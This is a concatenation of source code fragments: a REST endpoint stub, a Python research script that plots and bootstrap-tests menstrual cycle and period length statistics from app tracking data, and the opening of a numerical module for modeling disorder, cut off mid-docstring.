@ns.response(HTTPStatus.OK, "OK, installation details follow")
@ns.response(HTTPStatus.NO_CONTENT, "identifier not in whitelist")
def get(self, id):
"""A specific installation details"""
installation = Installation.db().get(id)
no_content = ("", HTTPStatus.NO_CONTENT)
return installation["event_data"] if installation else no_content
|
#!/usr/bin/python
# Imports
import sys, os, re, time
import argparse
import pdb
import pickle
from itertools import *
# Science
import numpy as np
import scipy.stats as stats
import pandas as pd
# Plotting
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
################################## FUNCTIONS ############################
# Population time-series
def population_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, sample_style, save_dir):
'''
Function that plots a population level time series embedding of cycle and period lengths
In plot:
x axis is length_attribute for cycle 1,
y axis is length attribute for cycle 2,
z is for cycle 3
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
sample_style: whether to pick 3 consecutive 'random' or 'first' cycles per-user
save_dir: path where to save plot
Output:
None
'''
#get users with color by attribute > cutoff, and <= cutoff
cycle_stats_df_greater_than = cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
# Filename
if sample_style == 'first':
filename = '{}/population_time_series_embedding_for_{}_split_by_{}_{}_first_3.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
if sample_style == 'random':
filename = '{}/population_time_series_embedding_for_{}_split_by_{}_{}_sample_3.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
# Plot
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for index, cycle_lengths in enumerate([cycle_lengths_greater_than, cycle_lengths_less_than]):
print('Start selecting cycles for one group')
if sample_style=='first':
sample_cycle_lengths = [cycle_length[:3] for cycle_length in cycle_lengths if len(cycle_length) >= 3]
if sample_style=='random':
sample_cycle_lengths = []
for cycle_length in cycle_lengths:
if len(cycle_length) >= 3:
num_cycles_array = np.linspace(0, len(cycle_length)-3, len(cycle_length)-2)
start_index = np.random.choice(num_cycles_array, size=1).astype(int)[0]
sample_cycle_lengths.append(cycle_length[start_index:start_index+3])
print('Finished selecting cycles for one group')
print('Start plotting one group')
for i in range(len(sample_cycle_lengths)):
xs = sample_cycle_lengths[i][0]
ys = sample_cycle_lengths[i][1]
zs = sample_cycle_lengths[i][2]
# Plot this point
ax.scatter(xs, ys, zs, color = colors[index], s=1, alpha=0.3)
print('Finished plotting one group')
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
#ref_line_points = np.linspace(10, 90, 10)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
#ref_line_points = np.linspace(1, max_period_days, 4)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
# With angles
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
# Add (a)/(b) labels for paper
ax.text2D(12, 7,'(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
# Time series embedding for a randomly chosen user
def random_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, save_dir):
'''
Function that plots a time series embedding of cycle and period lengths for a randomly chosen user per group
In plot:
x axis is length_attribute for cycle i,
y axis is length attribute for cycle i+1,
z is for cycle i+2
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
save_dir: path where to save plot
Output:
None
'''
# Select users with median number of cycles tracked
cycle_stats_df_median = cycle_stats_df[cycle_stats_df['num_cycles_tracked'] == 11]
filename = '{}/random_time_series_embedding_for_{}_split_by_{}_{}.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
#get users with color by attribute > cutoff, and <= cutoff
cycle_stats_df_greater_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
# Randomly pick a user from each group
cycle_lengths_greater_than_user = np.random.choice(cycle_lengths_greater_than, size=1, replace=False)
cycle_lengths_less_than_user = np.random.choice(cycle_lengths_less_than, size=1, replace=False)
# Plot
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
#plot each user, color by median intercycle length
xs = list(cycle_lengths_greater_than_user[0][0:-2])
ys = list(cycle_lengths_greater_than_user[0][1:-1])
zs = list(cycle_lengths_greater_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'orange')
ax.plot(xs, ys, zs, color='orange', linestyle='dashed', alpha=0.8)
xs = list(cycle_lengths_less_than_user[0][0:-2])
ys = list(cycle_lengths_less_than_user[0][1:-1])
zs = list(cycle_lengths_less_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'c')
ax.plot(xs, ys, zs, color='c', linestyle='dashed', alpha=0.8)
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
#ref_line_points = np.linspace(10, 90, 10)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
#ref_line_points = np.linspace(1, max_period_days, 4)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
# With angles
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
# Plot period and cycle length distributions per group
def plot_lengths_hist_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, pdf_or_cdf, save_dir):
'''
Function that plots cycle and period length distributions across groups
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about each user's cycle
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
pdf_or_cdf: whether to plot 'pdf's or 'cdf's
save_dir: path where to save plot
Output:
None
'''
# Identify groups per cutoff criteria
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
colors = ['orange', 'c']
labels=['Highly variable', 'NOT highly variable']
if attribute == 'cycle_length':
# Compute histogram
# Bins based on integer range of values
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Cycle length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Cycle length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Population
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
# Per-group
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
# Compute histogram
# Bins based on integer range of values
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
max_period_days=28
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Period length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Period length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Population
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
# Per-group
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
# Bootstrapped-KS for cycle and period length
def bootstrapped_cycle_period_lengths_KS(cycle_stats_df, cycle_df, cutoff_criteria, cutoff, n_bootstrapping, results_dir):
'''
Function that computes cycle and period length Kolmogorov-Smirnov tests between group distributions, based on bootstrapping
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about user's cycle
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
n_bootstrapping: Number of bootstrapped samples to use for the analysis
save_dir: path where to save plot
Output:
None
'''
# True separation of users into groups
true_users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
true_users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
n_users_greater_than_cutoff=true_users_greater_than_cutoff.size
n_users_less_than_cutoff=true_users_less_than_cutoff.size
########### TRUE OBSERVERD STATISTICS ##########
# Cycles per-group
true_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_greater_than_cutoff)]
true_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_less_than_cutoff)]
# KS cycle_length
true_KS_cycle_length, true_p_val_cycle_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['cycle_length'].dropna(), true_cycles_users_less_than_cutoff['cycle_length'].dropna())
# KS period_length
true_KS_period_length, true_p_val_period_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['period_length'].dropna(), true_cycles_users_less_than_cutoff['period_length'].dropna())
########### BOOTSTRAP BASED STATISTICS ##########
# Computed suff statistics
bootstrapped_KS_cycle_length=np.zeros(n_bootstrapping)
bootstrapped_p_val_cycle_length=np.zeros(n_bootstrapping)
bootstrapped_KS_period_length=np.zeros(n_bootstrapping)
bootstrapped_p_val_period_length=np.zeros(n_bootstrapping)
for n_bootstrap in np.arange(n_bootstrapping):
#print('Sample={}/{}'.format(n_bootstrap,n_bootstrapping))
# Bootstrapped sample indicators
bootstrapped_users_greater_than_cutoff=np.random.choice(true_users_greater_than_cutoff,n_bootstrapping)
bootstrapped_users_less_than_cutoff=np.random.choice(true_users_less_than_cutoff,n_bootstrapping)
# Cycles per-group
bootstrapped_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_greater_than_cutoff)]
bootstrapped_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_less_than_cutoff)]
# KS cycle_length
bootstrapped_KS_cycle_length[n_bootstrap], bootstrapped_p_val_cycle_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['cycle_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['cycle_length'].dropna())
# KS period_length
bootstrapped_KS_period_length[n_bootstrap], bootstrapped_p_val_period_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['period_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['period_length'].dropna())
# Print bootstrap results
print('*************************************************************************')
print('******** Cycle-length KS={} (p={}) ***********'.format(true_KS_cycle_length, true_p_val_cycle_length))
print('******** Cycle-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), bootstrapped_KS_cycle_length.std(), bootstrapped_p_val_cycle_length.mean(), bootstrapped_p_val_cycle_length.std()
))
print('******** Cycle-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), np.percentile(bootstrapped_KS_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_KS_cycle_length, 97.5, axis=0),
bootstrapped_p_val_cycle_length.mean(), np.percentile(bootstrapped_p_val_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_cycle_length, 97.5, axis=0)
))
print('*************************************************************************')
print('******** Period-length KS={} (p={}) ***********'.format(true_KS_period_length, true_p_val_period_length))
print('******** Period-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_period_length.mean(), bootstrapped_KS_period_length.std(), bootstrapped_p_val_period_length.mean(), bootstrapped_p_val_period_length.std()
))
print('******** Period-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_period_length.mean(), np.percentile(bootstrapped_KS_period_length, 2.5, axis=0), np.percentile(bootstrapped_KS_period_length, 97.5, axis=0),
bootstrapped_p_val_period_length.mean(), np.percentile(bootstrapped_p_val_period_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_period_length, 97.5, axis=0)
))
print('*************************************************************************')
# Average statistics over cycle-id
def plot_avg_lengths_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, save_dir):
'''
Function that plots cycle and period length average and standard deviation across user's timeline (i.e., by cycle-id) across groups
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about each user's cycle
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
save_dir: path where to save plot
Output:
None
'''
# Identify groups per cutoff criteria
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
# Plotting
colors = ['slateblue', 'c', 'orange']
max_cycle_id=20
if attribute == 'cycle_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
# Plot
axes[index].plot(np.unique(dataset['cycle_id'])[:20], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Cycle length')
axes[index].set_ylim(20,55)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
# Save and close
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
# Plot
axes[index].plot(np.unique(dataset['cycle_id'])[:20], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Period length')
axes[index].set_ylim(1,9)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
# Save and close
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
# Plot for max intercycle length (i.e., CLD) histogram
def plot_max_intercycle_length_hists(cycle_stats, cycle_stats_exclude_flagged, save_dir):
'''
Function that plots max inter cycle length (max CLD) histograms with and without excluded cycles
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
cycle_stats_exclude_flagged: pandas dataframe for users after removing excluded flags, with information about user's cycle statistics
save_dir: path where to save plot
Output:
None
'''
my_bins=np.arange(min(cycle_stats['max_inter_cycle_length']), max(cycle_stats['max_inter_cycle_length']) + 1)
plt.hist(cycle_stats['max_inter_cycle_length'], bins=my_bins, label='With behaviorally-tainted cycles', color='blue', histtype='step')
plt.hist(cycle_stats_exclude_flagged['max_inter_cycle_length'], bins=my_bins, label='Excluding behaviorally-tainted cycles', color='red', histtype='step')
plt.autoscale(enable=True, tight=True, axis='x')
plt.ylim(0,38000)
plt.xlabel('Maximum CLD in days')
plt.ylabel('User count with maximum CLD')
plt.savefig('{}/hist_max_inter_cycle_length_with_and_without_excluded_flags.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
# Plot for median Vs max intercycle length (i.e., CLD) histogram
def plot_median_vs_max_intercycle_length(cycle_stats, save_dir):
'''
Function that plots median Vs max inter cycle length (CLD) 2D scatter histogram
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
save_dir: path where to save plot
Output:
None
'''
plt.hist2d(cycle_stats['median_inter_cycle_length'], cycle_stats['max_inter_cycle_length'], bins=(75, 75), cmap='jet', norm=colors.LogNorm())
plt.autoscale(enable=True, tight=True)
range_vals_median = np.linspace(min(cycle_stats['median_inter_cycle_length']), max(cycle_stats['median_inter_cycle_length']), 100)
plt.plot(range_vals_median, range_vals_median+10, label='Median CLD + 10', color='red')
plt.xlabel('Median CLD')
plt.ylabel('Maximum CLD')
plt.xlim((0,75))
plt.ylim((0, 75))
plt.colorbar()
plt.savefig('{}/median_vs_max_scatter_2d_hist.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
# Plot for median intercycle length (i.e., CLD) histogram
def plot_median_CLD_hist(cycle_stats, pdf_or_cdf, save_dir):
'''
Function that plots median CLD histograms
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
pdf_or_cdf: whether to plot 'pdf's or 'cdf's
save_dir: path where to save plot
Output:
None
'''
# Median CLD histogram
my_bins=np.arange(cycle_stats['median_inter_cycle_length'].dropna().min(),cycle_stats['median_inter_cycle_length'].dropna().max()+1)
all_counts, all_bins = np.histogram(cycle_stats['median_inter_cycle_length'].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Median CLD = n)'
cohort_filename = '{}/median_CLD_pdf_cohort.pdf'.format(save_dir)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Median CLD $\leq$ n)'
cohort_filename = '{}/median_CLD_cdf_cohort.pdf'.format(save_dir)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Actual plot
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xlabel('Median CLD in days')
plt.ylabel('P(Median CLD $\leq$ n)')
plt.grid(True)
plt.savefig('{}/median_CLD_cdf.pdf'.format(save_dir), format='pdf', bbox_inches='tight')
plt.close()
################################## MAIN ############################
def main():
'''
Main function of the script that runs the cycle and period length related analysis
Input:
None
Output:
None
'''
### Directories
data_dir='../data'
preprocessed_data_dir='../preprocessed_data'
results_dir = '../results/characterizing_cycle_and_symptoms/cycle_period_length_analysis'
os.makedirs(results_dir, exist_ok = True)
################# SYMPTOMS TRACKED #################
# Tracking
with open('{}/tracking_enriched.pickle'.format(data_dir), 'rb') as f:
tracking = pickle.load(f)
print('Tracking-data loaded')
################# CYCLES #################
with open('{}/cohort_cycle_stats.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_cycle_stats = pickle.load(f)
# Cycles flagged
with open('{}/cohort_cycles_flagged.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_cycles_flagged = pickle.load(f)
# Exclude cycles flagged as badly tracked
cohort_cycles = cohort_cycles_flagged[cohort_cycles_flagged['badly_tracked_cycle'] == 'f']
# Cycles stats
with open('{}/cohort_clean_cycle_stats.pickle'.format(preprocessed_data_dir), 'rb') as f:
cohort_clean_cycle_stats = pickle.load(f)
print('Cycles-data loaded')
################# PLOTTING #################
#### PLOT histogram of max intercycle length, with and without excluding flagged cycles
plot_max_intercycle_length_hists(cohort_cycle_stats, cohort_clean_cycle_stats, results_dir)
#### PLOT Median Vs Max CLD 2D histogram
plot_median_vs_max_intercycle_length(cohort_clean_cycle_stats, results_dir)
#### PLOT Median CLD histogram
plot_median_CLD_hist(cohort_clean_cycle_stats, 'cdf', results_dir)
#### PLOT cycle and period length histograms: pdf
plot_lengths_hist_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'cycle_length', 'median_inter_cycle_length', 9, 'pdf', results_dir)
plot_lengths_hist_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'period_length', 'median_inter_cycle_length', 9, 'pdf', results_dir)
#### Bootstrapped-KS cycle and period length
bootstrapped_cycle_period_lengths_KS(cohort_clean_cycle_stats, cohort_cycles, 'median_inter_cycle_length', 9, 100000, results_dir)
#### PLOT average cycle and average length over cycle-id
plot_avg_lengths_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'cycle_length', 'median_inter_cycle_length', 9, results_dir)
plot_avg_lengths_by_attribute_cutoff(cohort_clean_cycle_stats, cohort_cycles, 'period_length', 'median_inter_cycle_length', 9, results_dir)
#### PLOT random cycle length time-series
random_time_series_embedding_lengths(cohort_clean_cycle_stats, 'cycle_lengths', 'median_inter_cycle_length', 9, results_dir)
#### PLOT population level cycle and period length time-series
population_time_series_embedding_lengths(cohort_clean_cycle_stats, 'cycle_lengths', 'median_inter_cycle_length', 9, 'random', results_dir)
population_time_series_embedding_lengths(cohort_clean_cycle_stats, 'period_lengths', 'median_inter_cycle_length', 9, 'random', results_dir)
# Making sure the main program is not executed when the module is imported
if __name__ == '__main__':
# Just run the main
main()
|
# coding: utf-8
#
# This code is part of cmpy.
#
# Copyright (c) 2022, Dylan Jones
"""This module contains methods for modeling disorder."""
import numpy as np
from typing import Union, Sequence
def create_subst_array(
size: int, values: Sequence[float], conc: Union[float, Sequence[float]]
) -> np.ndarray:
"""Creates an (ordered) array of values.
Parameters
----------
size : int
The size of the output array.
values : Sequence of float
The values for filling the array. The size must match the size of the
concentrations. If one concentration is given the value-array must be of size 2.
conc : float or Sequence of float
The concentrations of the values. If a single concentration is given
it is interpreted as the concentration of the first of two values.
Returns
-------
array : np.ndarray
The (ordered) array filled with the given values.
"""
# Get sizes of sub-arrays
if isinstance(conc, float):
conc = [conc, 1 - conc]
if sum(conc) != 1:
raise ValueError("Fractions have to add up to 1!")
sizes = (size * np.array(conc)).astype(np.int64)
sizes[-1] += size - sum(sizes)
# create sub-arrays
arrays = [np.full(size, val) for size, val in zip(sizes, values)]
return np.concatenate(arrays)
def random_permutations(
arr: Sequence[float], size: int, replace: bool = False, seed: int = None
):
"""Creates (optionally unique) permutations of a given array.
Parameters
----------
arr : (N) np.ndarray
The input array to permute.
size : int
The number of permutations to generate.
replace : bool, optional
If `True`, only unique permutations are returned. The default is `True`.
seed : int, optional
A optional seed to initialize the random number generator.
Yields
------
perm : (N) np.ndarray
The permuted array.
Examples
--------
>>> a = [0, 0, 1, 1, 1]
>>> perm = random_permutations(a, size=2, seed=0)
>>> next(perm)
array([1, 1, 1, 0, 0])
>>> next(perm)
array([0, 1, 1, 1, 0])
"""
